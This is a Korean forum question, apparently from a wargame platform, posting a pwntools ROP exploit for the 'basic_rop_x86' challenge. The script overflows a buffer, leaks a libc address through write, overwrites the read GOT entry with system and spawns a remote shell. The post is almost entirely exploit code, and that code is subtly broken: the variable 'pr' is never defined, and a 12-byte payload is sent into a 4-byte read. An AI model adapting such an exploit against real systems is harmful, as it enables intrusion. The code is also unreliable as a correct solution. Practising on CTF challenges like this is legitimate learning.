EOF..... : (
from pwn import *
context.log_level = 'debug'
context.arch = 'i386'
shell = remote('host3.dreamhack.games',22260)
elf = ELF('./basic_rop_x86')
libc = ELF('./libc.so.6')
pppr = 0x08048689
read_plt = elf.plt['read']
read_got = elf.got['read']
write_plt = elf.plt['write']
payload = b'A'*0x44 + b'B'*0x4
#read_got 주소 릭
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(read_got)
payload += p32(4)
# read_got 에 system함수 입력
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(read_got)
payload += p32(4)
# system(/bin/sh\x00)
payload += p32(read_plt)
payload += p32(pr)
payload += p32(read_got+0x8)
shell.send(payload)
shell.recvuntil(b'A'*0x40)
read = u32(shell.recvn(4))
lb = read - libc.sym['read']
system = lb + libc.sym['system']
shell.send(p32(system)+b'/bin/sh\x00')
shell.interactive()
잘못된 부분이 있을까요!
#pwnable
작성자 정보
답변
1
ohohohohohohohohoh
질문 등록: 5
해결했습니다.
질문에 대한 답을 알고 계신가요?
지식을 나누고 포인트를 획득해보세요.
답변하고 포인트 받기 지식을 나누고 포인트를 획득해보세요.
